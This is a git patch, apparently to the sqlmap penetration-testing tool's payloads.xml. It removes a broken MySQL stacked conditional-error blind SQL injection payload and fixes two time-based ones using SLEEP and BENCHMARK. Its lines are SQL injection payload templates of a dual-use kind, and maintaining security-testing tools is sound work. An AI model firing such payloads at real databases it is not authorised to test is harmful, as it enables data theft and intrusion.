From ad07add549e2338498d9305e1b3fb6f882f84fbc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 5 Jun 2013 14:32:06 +0200 Subject: [PATCH] Fixing MySQL/stacked payloads (also removing stacked conditional-error version as it's syntatically incorrect) --- xml/payloads.xml | 24 ++---------------------- 1 file changed, 2 insertions(+), 22 deletions(-) diff --git a/xml/payloads.xml b/xml/payloads.xml index 83a0c8a12..de9e5a80d 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -1084,26 +1084,6 @@ Formats: - - MySQL stacked conditional-error blind queries - 1 - 3 - 0 - 0 - 1 - ; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - - ; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - # - - - ; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]) - -
- MySQL -
- - Microsoft SQL Server/Sybase stacked conditional-error blind queries 1 @@ -2025,7 +2005,7 @@ Formats: 0 0 1 - ; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + ; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) ; SELECT SLEEP([SLEEPTIME]) -- @@ -2046,7 +2026,7 @@ Formats: 2 0 1 - ; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + ; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) ; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) --